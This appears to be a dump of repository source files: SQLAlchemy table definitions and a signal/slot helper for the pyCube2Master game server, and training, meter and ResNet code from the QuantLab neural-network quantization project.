"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 325, "license_type": "no_license", "max_line_length": 77, "num_lines": 10, "path": "/src/BaseTables/UserGroup.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserGroup(database_manager.Base):\n __tablename__ = table_names['UserGroup']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(48), nullable=False)\n \n def __init__(self, name):\n self.name = name" }, { "alpha_fraction": 0.6262376308441162, "alphanum_fraction": 0.6311880946159363, "avg_line_length": 39.5, "blob_id": "b409e4fc8e1251f570ea251ca6d475df53ad3910", "content_id": "fdecdae3c433f1edf0fc83aa75bbf252488cd82d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 77, "num_lines": 10, "path": "/src/BaseTables/Gun.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Gun(database_manager.Base):\n __tablename__ = table_names['Gun']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n number = Column(SmallInteger, nullable=False, index=True)\n name = Column(String(16), nullable=False)\n damage = Column(Integer, nullable=False)" }, { "alpha_fraction": 0.6145404577255249, "alphanum_fraction": 0.6172839403152466, "avg_line_length": 33.761905670166016, "blob_id": "3f19affa5985c090662dac9213095dee53d803e8", "content_id": "7dbe25a35f943b300051eb043d4b7a5172fff1f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 99, "num_lines": 21, "path": "/src/BaseTables/UserName.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserName(database_manager.Base):\n __tablename__ = table_names['UserName']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n user_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n name = Column(String(16), nullable=False)\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n user = relationship('User', back_populates=\"names\")\n \n def __init__(self, user_id, name):\n self.user_id = user_id\n self.name = name\n \n @staticmethod\n def all_names():\n with Session() as session:\n return session.query(UserName.name).all()" }, { "alpha_fraction": 0.647948145866394, "alphanum_fraction": 0.6522678136825562, "avg_line_length": 34.653846740722656, "blob_id": "beed3670ef82acfb67161e13394c9be73a4190bf", "content_id": "9535dd2d7628168f84d164a4e8f1001495d1619a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 92, "num_lines": 26, "path": "/src/BaseTables/PunitiveEffectType.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PunitiveEffectType(database_manager.Base):\n __tablename__ = table_names['PunitiveEffectType']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(16))\n default_expiry_type = Column(Integer)\n default_duration = Column(BigInteger)\n \n expiry_types = enum(NEVEREXPIRES=-1, EXPIRYDATE=0)\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n def __init__(self, name, default_expiry_type, default_duration):\n self.name = name\n self.default_expiry_type = default_expiry_type\n self.default_duration = default_duration\n \n @staticmethod\n def by_name(name):\n try:\n with Session() as session:\n return session.query(EffectType).filter(PunitiveEffectType.name==name).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6086350679397583, "alphanum_fraction": 0.6142061352729797, "avg_line_length": 31.68181800842285, "blob_id": "7c6e423edc2d15d41b5d12eb155a9a45c43ba46d", "content_id": "ee03b3147411667b9b213e235fcbacfefd5e3d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 718, "license_type": "no_license", "max_line_length": 90, "num_lines": 22, "path": "/src/BaseTables/ServerDomain.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ServerDomain(database_manager.Base):\n __tablename__ = table_names['ServerDomain']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(64), index=True)\n pubkey = Column(String(49))\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n def __init__(self, name, pubkey):\n self.name = name\n self.pubkey = pubkey\n \n @staticmethod\n def by_domain(domain):\n with Session() as session:\n try:\n return session.query(ServerDomain).filter(ServerDomain.name==domain).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6514459848403931, "alphanum_fraction": 0.6514459848403931, "avg_line_length": 49.61538314819336, "blob_id": "49dd11ed58e4579a8ab449fd15debd6f50180f5e", "content_id": "4cb21e835a5007eefc68311a3c3e33d2b52d3f0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 98, "num_lines": 13, "path": "/src/BaseTables/DamageDealtEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass DamageDealtEvent(database_manager.Base):\n __tablename__ = table_names['DamageDealtEvent']\n id = Column(BigInteger, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n target = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n shot = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=False)\n \n when = Column(DateTime, nullable=False)\n distance = Column(Integer, nullable=False)" }, { "alpha_fraction": 0.647230327129364, "alphanum_fraction": 0.6511175632476807, "avg_line_length": 48.0476188659668, "blob_id": "5e4adaef92f46cb58cee105b19df2b5c40b6651e", "content_id": "9be1b395ec2c80caa3ccb2ba8cbd512979cd2dbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 98, "num_lines": 21, "path": "/src/BaseTables/FragEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass FragEvent(database_manager.Base):\n __tablename__ = table_names['FragEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n shot_id = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=False)\n target_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n \n when = Column(DateTime, nullable=False)\n type = Column(SmallInteger, nullable=False)\n \n types = enum(NORMAL=0, TEAMKILL=1, BOT=2, SPAWNKILL=3)\n \n who = relationship('User', primaryjoin=\"User.id==FragEvent.who_id\")\n match = relationship('Match')\n shot = relationship('ShotEvent')\n target = relationship('User', primaryjoin=\"User.id==FragEvent.target_id\")" }, { "alpha_fraction": 0.6066176295280457, "alphanum_fraction": 0.6066176295280457, "avg_line_length": 57.35714340209961, "blob_id": "6ead4badbcb25243574233df0b47ba284bbd3f62", "content_id": "0e373b6851feeb8a5ac18ee7624b1cf034d619bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 816, "license_type": "no_license", "max_line_length": 115, "num_lines": 14, "path": "/src/BaseTables/Match.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Match(database_manager.Base):\n __tablename__ = table_names['Match']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n mode_id = Column(SmallInteger, ForeignKey(table_names['Mode']+'.id'), nullable=False)\n pseudomode_id = Column(SmallInteger, ForeignKey(table_names['PseudoMode']+'.id'), nullable=False)\n server_id = Column(Integer, ForeignKey(table_names['ServerInstance']+'.id'), nullable=False)\n game_version_id = Column(Integer, ForeignKey(table_names['GameVersion']+'.id'), nullable=False)\n \n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)" }, { "alpha_fraction": 0.6391891837120056, "alphanum_fraction": 0.6391891837120056, "avg_line_length": 51.92856979370117, "blob_id": "7094e6bed74824c28f194000ab5d48c328bb33f4", "content_id": "0448585020fd5a7016a5d7bd06419619b4639bc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 98, "num_lines": 14, "path": "/src/BaseTables/DeathEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass DeathEvent(database_manager.Base):\n __tablename__ = table_names['DeathEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n killer = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n shot = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=True)\n \n when = Column(DateTime, nullable=False)\n type = Column(SmallInteger, nullable=False)" }, { "alpha_fraction": 0.6250928044319153, "alphanum_fraction": 0.6288047432899475, "avg_line_length": 35.43243408203125, "blob_id": "2a32c89597aa33d5a3277e3d11e4766fbafb4b80", "content_id": "c43d83b8a4d9438648ed1fd597a24c6227c8f7fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/src/BaseTables/User.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass User(database_manager.Base):\n __tablename__ = table_names['User']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n email = Column(String(128), index=True)\n pubkey = Column(String(49), nullable=False)\n approved = Column(Boolean)\n \n UniqueConstraint(email, name=__tablename__+'_uq_email')\n \n names = relationship('UserName', order_by='UserName.id', back_populates=\"user\")\n group_memberships = relationship('UserGroupMembership', order_by='UserGroupMembership.id', back_populates=\"user\")\n \n def __init__(self, email, pubkey):\n self.email = email\n self.pubkey = pubkey\n self.approved = True\n \n @property\n def name_list(self):\n with Session() as session:\n return session.query('UserName.name').filter('UserName.user_id'==self.id).all()\n \n @property\n def group_list(self):\n with Session() as session:\n return session.query('UserGroupMembership.group.name').filter('UserGroupMembership.user_id'==self.id).all()\n \n @staticmethod\n def by_email(email):\n try:\n with Session() as session:\n return session.query(User).filter(User.email==email).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6075757741928101, "avg_line_length": 51.84000015258789, "blob_id": "e6b8479bc58f9be6dd3a7b3451dd07e4c932609e", "content_id": "0f9c3f1c6803c8c6842ccbad84667d33f72dcf6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 135, "num_lines": 25, "path": "/src/BaseTables/ServerInstance.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ServerInstance(database_manager.Base):\n __tablename__ = table_names['ServerInstance']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n domain_id = Column(SmallInteger, ForeignKey(table_names['ServerDomain']+'.id'), nullable=False)\n game_id = Column(SmallInteger, ForeignKey(table_names['Game']+'.id'), nullable=False)\n mod_id = Column(SmallInteger, ForeignKey(table_names['ServerMod']+'.id'), nullable=False)\n \n name = Column(String(32), nullable=False)\n port = Column(Integer, nullable=False)\n \n domain = relationship('ServerDomain', backref=backref('instances', order_by=id))\n game = relationship('Game', backref=backref('server_instances', order_by=id))\n mod = relationship('ServerMod', backref=backref('server_instances', order_by=id))\n \n @staticmethod\n def by_domain_port(domain, port):\n with Session() as session:\n try:\n return session.query(ServerInstance).filter(ServerInstance.domain.name==domain).filter(ServerInstance.port==port).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.5552918910980225, "alphanum_fraction": 0.5552918910980225, "avg_line_length": 28.26388931274414, "blob_id": "c92153e304452b28309c17a41a27261919f8bb5e", "content_id": "6a69bacfb90328cb52a16689c5c78906e7b68b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2107, "license_type": "no_license", "max_line_length": 74, "num_lines": 72, "path": "/src/Signals.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"\nAn extremely simple synchonous signal/slot handler system.\n\"\"\"\n\nclass Signal(object):\n def __init__(self):\n self.slots = []\n \n def connect(self, slot):\n if not slot in self.slots:\n self.slots.append(slot)\n \n def disconnect(self, slot):\n if slot in self.slots:\n self.slots.remove(slot)\n \n def emit(self, *args):\n for slot in self.slots:\n slot(*args)\n\nclass SignalObject(object):\n def __init__(self):\n \"Initialize each attribute signal.\"\n for key in dir(self):\n val = self.__getattribute__(key)\n if type(val) == type and issubclass(val, Signal):\n self.__setattr__(key, Signal())\n \nimport unittest\n\nclass TestSignals(unittest.TestCase):\n\n class TestListModel(SignalObject):\n \n update = Signal\n \n def __init__(self):\n SignalObject.__init__(self)\n self.data_list = []\n\n def add(self, datum):\n self.data_list.append(datum)\n self.update.emit(self.data_list[:])\n \n class TestListView(object):\n def __init__(self, model):\n self.model = model\n self.model.update.connect(self.on_model_update)\n self.data_cache = []\n \n def on_model_update(self, data_list):\n self.data_cache = data_list\n\n def setUp(self):\n self.test_model = self.TestListModel()\n self.test_view = self.TestListView(self.test_model)\n\n def test_signals(self):\n self.test_model.add('foo')\n self.assertEqual(self.test_view.data_cache, ['foo'])\n self.test_model.add('bar')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar'])\n self.test_model.add('baz')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar', 'baz'])\n \n self.test_model.update.disconnect(self.test_view.on_model_update)\n \n self.test_model.add('zan')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar', 'baz'])\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5954598188400269, "alphanum_fraction": 0.5980791449546814, "avg_line_length": 41.432098388671875, "blob_id": "8b67742447b3a754a644c1650ed931c0223b1442", "content_id": "1266a2dfa782b3e7062a631f0ebf87ea963f8230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3436, "license_type": "no_license", "max_line_length": 111, "num_lines": 81, "path": "/src/BaseTables/PunitiveEffect.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PunitiveEffect(database_manager.Base):\n __tablename__ = table_names['PunitiveEffect']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n effect_type_id = Column(Integer, ForeignKey(table_names['PunitiveEffectType']+'.id'), nullable=False)\n \n target_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n target_ip = Column(BigInteger, nullable=False, index=True)\n target_mask = Column(BigInteger, nullable=False, index=True)\n target_name = Column(String(16), nullable=False)\n \n server_id = Column(Integer, ForeignKey(table_names['ServerInstance']+'.id'), nullable=False)\n \n master_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n master_ip = Column(BigInteger, nullable=True)\n master_name = Column(String(16), nullable=False)\n \n created_time = Column(DateTime, nullable=False)\n modified_time = Column(DateTime, nullable=False)\n expiry_type = Column(Integer, nullable=False)\n expiry_time = Column(DateTime(), nullable=True)\n \n expiry_types = enum(NEVEREXPIRES=-1, EXPIRYDATE=0)\n \n expired = Column(Boolean)\n \n reason = Column(String(128))\n \n effect_type = relationship('PunitiveEffectType')\n \n def __init__(self, effect_type, target_id, target_ip, target_mask, target_name, \n master_id, master_ip, master_name, reason):\n \n self.effect_type = effect_type\n \n self.target_id = target_id\n self.target_ip = target_ip\n self.target_mask = target_mask\n self.target_name = target_name\n \n self.master_id = master_id\n self.master_ip = master_ip\n self.master_name = master_name\n \n self.created_time = datetime.datetime.now()\n self.modified_time = datetime.datetime.now()\n self.expiry_type = self.effect_type.default_expiry_type\n if self.expiry_type != NEVEREXPIRES:\n self.expiry_time = datetime.datetime.fromtimestamp(time.time()+self.effect_type.default_duration)\n else:\n self.expiry_time = None\n \n self.expired = False\n \n self.reason = reason\n\n @staticmethod\n def query_expired(query):\n query = query.filter(not PunitiveEffect.expired)\n return query.filter(and_(PunitiveEffect.expiry_type!=EXPIRYDATE, \n PunitiveEffect.expiry_time>datetime.datetime.now()))\n \n @staticmethod\n def expire(effect_id):\n \"If a matching effect was found unexpired set it to expired and return True else return False.\"\n try:\n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect)\n punitive_effect_query = punitive_effect_query.filter(PunitiveEffect.id==effect_id)\n punitive_effect_query = punitive_effect_query.filter(not PunitiveEffect.expired)\n \n punitive_effect = punitive_effect_query.one()\n \n punitive_effect.expiry_type = EXPIRED\n session.commit()\n \n return True\n except NoResultFound:\n return False" }, { "alpha_fraction": 0.6114790439605713, "alphanum_fraction": 0.6158940196037292, "avg_line_length": 40.272727966308594, "blob_id": "03cc2b9b49ac9092755c8db5ef10ca9184f5ec9a", "content_id": "e0c9f85343ecdb354e001ce39f74aac7419b08c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/src/BaseTables/Mode.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Mode(database_manager.Base):\n __tablename__ = table_names['Mode']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n \n game_id = Column(SmallInteger, ForeignKey(table_names['Game']+'.id'), nullable=False)\n \n number = Column(SmallInteger, nullable=False)\n name = Column(String(16), nullable=False)" }, { "alpha_fraction": 0.6298932433128357, "alphanum_fraction": 0.6298932433128357, "avg_line_length": 42.30769348144531, "blob_id": "c47bcd96e2a9dcf8ce9f39c1f01ada7f9424ee2e", "content_id": "03cb29fb956b3bfb8f8d6d22ed97000b6d0b0b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 562, "license_type": "no_license", "max_line_length": 99, "num_lines": 13, "path": "/src/BaseTables/ActivitySpan.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ActivitySpan(database_manager.Base):\n __tablename__ = table_names['ActivitySpan']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n \n type = Column(SmallInteger, nullable=False)\n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n millis = Column(Integer, nullable=False)" } ]
30
jmt7080/IST303_GroupProject_MW
https://github.com/jmt7080/IST303_GroupProject_MW
78f73ed5153c1a57c401edaa22cb082f97b92de9
a45128399d654aee6bed9738d82d53f27e7addfe
b883d0e68bcc1549e0d8870c29fc7790dc6fd941
refs/heads/master
2021-01-20T09:24:11.979271
2016-05-30T04:48:42
2016-05-30T04:48:42
59,793,017
0
0
null
2016-05-27T00:58:09
2016-05-26T19:48:08
2016-05-26T19:48:07
null
[ { "alpha_fraction": 0.5505896806716919, "alphanum_fraction": 0.5630043745040894, "avg_line_length": 24.31147575378418, "blob_id": "69851b7e312347c61ee32bf98123158e7095ebde", "content_id": "d18561d595541f322f922fcdb6997a66ff22e07e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 97, "num_lines": 61, "path": "/IST303Project.py", "repo_name": "jmt7080/IST303_GroupProject_MW", "src_encoding": "UTF-8", "text": "#from Tkinter import *\r\n#root = Tk()\r\n#root.mainloop()\r\nfrom datetime import *\r\nimport csv\r\nimport pandas as pd\r\n\r\nguest_list = pd.read_csv(\"C:\\Users\\MSI CES 2014\\Documents\\IST 303 GuestList.csv\", index_col = 0)\r\nservice_list = pd.read_csv(\"C:\\Users\\MSI CES 2014\\Documents\\IST 303 services.csv\", index_col = 0)\r\n\r\n\r\n\r\nclass customer:\r\n\r\n def __init__(self, input_id):\r\n self.input_id = input_id\r\n\r\n def check_for_cust(self):\r\n for lab, row in guest_list.iterrows():\r\n if answer.input_id== lab:\r\n print \"yes\"\r\n return True\r\n print \"no\"\r\n return False\r\n\r\n def lookup_service(self):\r\n #if not customer.check_for_cust():\r\n # return\r\n for lab, row in guest_list.iterrows():\r\n if answer.input_id == lab:\r\n print \"Customer ID is valid. Here are the reservation info\"\r\n print row\r\n for lab1, row1 in service_list.iterrows():\r\n if answer.input_id == lab1:\r\n print row1\r\n print \"No reservation yet\"\r\n return\r\n print \"Customer ID is not valid\"\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass reservations(customer):\r\n def __init__(self, mineral_bath, massage, facial, specialty):\r\n self.mineral_bath = mineral_bath\r\n self.massage = massage\r\n self.facial = facial\r\n self.specialty = specialty\r\n\r\n\r\n\r\n\r\n#answer = customer(input(\"Enter customer ID\"))\r\n#answer.check_for_cust()\r\n\r\n\r\nanswer = customer(input(\"Enter customer ID\"))\r\n#answer.check_for_cust()\r\nanswer.lookup_service()\r\n\r\n\r\n\r\n" } ]
1
xiaywang/QuantLab
https://github.com/xiaywang/QuantLab
8fe1d4ce65fc7cd0c897828f8fe1a129b3b4eb50
32343d6aff528f9285ab72e3f936e264ed11ec38
2f2f1ebbb4ff4d7d79682b489ff6d431064b9929
refs/heads/master
2023-01-13T06:24:42.654078
2020-11-20T12:51:55
2020-11-20T12:51:55
261,223,022
0
0
null
2020-05-04T15:27:22
2020-04-17T12:20:31
2020-02-26T12:35:00
null
[ { "alpha_fraction": 0.5164769291877747, "alphanum_fraction": 0.5266626477241516, "avg_line_length": 34.51063919067383, "blob_id": "f51f7e213d61b831b001dd6cb422db6c05b65b9c", "content_id": "98e395b7489a806a5d06808234cd355e5686a99b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1669, "license_type": "permissive", "max_line_length": 118, "num_lines": 47, "path": "/quantlab/BCI-CompIV-2a/utils/meter.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport math\n\n\nclass Meter(object):\n def __init__(self, pp_pr, pp_gt):\n self.n_tracked = None\n self.loss = None\n self.avg_loss = None\n # main metric is classification error\n self.pp_pr = pp_pr\n self.pp_gt = pp_gt\n self.start_metric = 0.0\n self.correct = None\n self.avg_metric = None\n self.reset()\n\n def reset(self):\n self.n_tracked = 0\n self.loss = 0.\n self.avg_loss = 0.\n self.correct = 0\n self.avg_metric = self.start_metric\n\n def update(self, pr_outs, gt_labels, loss, track_metric=False):\n gt_labels = self.pp_gt(gt_labels)\n batch_size = len(gt_labels)\n self.n_tracked += batch_size\n # update loss\n self.loss += loss * batch_size\n self.avg_loss = self.loss / self.n_tracked\n if track_metric:\n # update main metric\n pr_labels = self.pp_pr(pr_outs)\n assert len(pr_labels) == len(gt_labels), 'Number of predictions and number of ground truths do not match!'\n for i in range(len(pr_labels)):\n self.correct += pr_labels[i] == gt_labels[i]\n self.avg_metric = (self.correct / self.n_tracked)\n\n def is_better(self, current_metric, best_metric):\n # compare classification errors\n return current_metric > best_metric\n\n def bar(self):\n return '| Loss: {loss:8.5f} | Accuracy: {acc:6.2f}%%'.format(loss=self.avg_loss,\n acc=self.avg_metric * 100)\n" }, { "alpha_fraction": 0.6115989089012146, "alphanum_fraction": 0.6146620512008667, "avg_line_length": 45.63809585571289, "blob_id": "6257e3a306db6422b31bc194be7442856bd32b7a", "content_id": "d013b7214dc3d2bb786e6f2ab2069071821ff43f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4897, "license_type": "permissive", "max_line_length": 109, "num_lines": 105, "path": "/quantlab/treat/daemon.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.optim as optim\nimport torch.utils.data as tud\n\nimport itertools\n\nfrom quantlab.treat.thermo.thermostat import Thermostat\nimport quantlab.treat.algo.lr_schedulers as lr_schedulers\n\nclass DynamicSubsetRandomSampler(tud.Sampler):\n r\"\"\"Samples a fixed number of elements randomly from a dataset of fixed size without replacement.\n\n Arguments:\n numSamples: the number of samples to take\n datasetLen: the size of the dataset from which to draw samples\n \"\"\"\n\n def __init__(self, numSamples, datasetLen):\n assert(isinstance(datasetLen, int) or datasetLen.is_integer())\n assert(isinstance(numSamples, int) or numSamples.is_integer())\n self.datasetLen = datasetLen\n self.numSamples = numSamples\n\n def __iter__(self):\n numFullSets = self.numSamples // self.datasetLen\n numRemainingSamples = self.numSamples - numFullSets*self.datasetLen\n indexesAll = (i for i in list())\n for i in range(numFullSets):\n indexes = torch.randperm(self.datasetLen)\n indexesAll = itertools.chain(indexesAll, \n (i.item() for i in indexes))\n indexes = torch.randperm(self.datasetLen)[:numRemainingSamples]\n indexesAll = itertools.chain(indexesAll, \n (i.item() for i in indexes))\n return indexesAll\n\n def __len__(self):\n return self.numSamples\n\ndef get_algo(logbook, net):\n \"\"\"Return a training procedure for the experiment.\"\"\"\n # set ANA cooling schedule\n thr_config = logbook.config['treat']['thermostat']\n thr = Thermostat(net, **thr_config['params'])\n if logbook.ckpt:\n thr.load_state_dict(logbook.ckpt['treat']['thermostat'])\n # set algo algorithm\n opt_config = logbook.config['treat']['optimizer']\n opt = optim.__dict__[opt_config['class']](net.parameters(), **opt_config['params'])\n if logbook.ckpt:\n opt.load_state_dict(logbook.ckpt['treat']['optimizer'])\n lr_sched_config = logbook.config['treat']['lr_scheduler']\n lr_sched_dict = {**optim.lr_scheduler.__dict__, **lr_schedulers.__dict__}\n lr_sched = lr_sched_dict[lr_sched_config['class']](opt, **lr_sched_config['params'])\n if logbook.ckpt:\n lr_sched.load_state_dict(logbook.ckpt['treat']['lr_scheduler'])\n return thr, opt, lr_sched\n\n\ndef get_data(logbook, num_workers=10):\n \"\"\"Return data for the experiment.\"\"\"\n data_config = logbook.config['treat']['data']\n # make dataset random split consistent (to prevent training instances from filtering into validation set)\n rng_state = torch.get_rng_state()\n torch.manual_seed(1234)\n # load preprocessed datasets\n train_set, valid_set, test_set = logbook.module.load_data_sets(logbook.dir_data, data_config)\n # create random training set subselector for mini-epochs\n if 'epoch_size_train' in data_config.keys():\n shuffleTrain = False\n cfgVal = float(data_config['epoch_size_train'])\n# if cfgVal > 1:\n# assert(cfgVal.is_integer())\n# numSamples = int(cfgVal)\n# else:\n numSamples = int(cfgVal*len(train_set))\n# assert(numSamples <= len(train_set))\n samplerTrain = DynamicSubsetRandomSampler(numSamples, len(train_set))\n else:\n shuffleTrain, samplerTrain = True, None\n # create loaders\n if hasattr(train_set, 'collate_fn'): # if one data set needs `collate`, all the data sets should\n train_l = tud.DataLoader(train_set, batch_size=data_config['bs_train'], \n shuffle=shuffleTrain, sampler=samplerTrain, \n num_workers=num_workers, \n collate_fn=train_set.collate_fn)\n valid_l = tud.DataLoader(valid_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers, \n collate_fn=valid_set.collate_fn)\n test_l = tud.DataLoader(test_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers, \n collate_fn=test_set.collate_fn)\n else:\n train_l = tud.DataLoader(train_set, batch_size=data_config['bs_train'], \n shuffle=shuffleTrain, sampler=samplerTrain, \n num_workers=num_workers)\n valid_l = tud.DataLoader(valid_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers)\n test_l = tud.DataLoader(test_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers)\n torch.set_rng_state(rng_state)\n return train_l, valid_l, test_l\n" }, { "alpha_fraction": 0.5303713083267212, "alphanum_fraction": 0.5546000599861145, "avg_line_length": 40.7879638671875, "blob_id": "0a4e58a2c41106fdf6f0d7ca1a7a9be3c7cfd23f", "content_id": "97873b44e734af6a1773b1d3dfd5736a34f279b5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14652, "license_type": "permissive", "max_line_length": 121, "num_lines": 349, "path": "/quantlab/ImageNet/ResNet/resnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n# large parts of the code taken or adapted from torchvision\n\nimport math\nimport torch\nimport torch.nn as nn\n\n#from quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 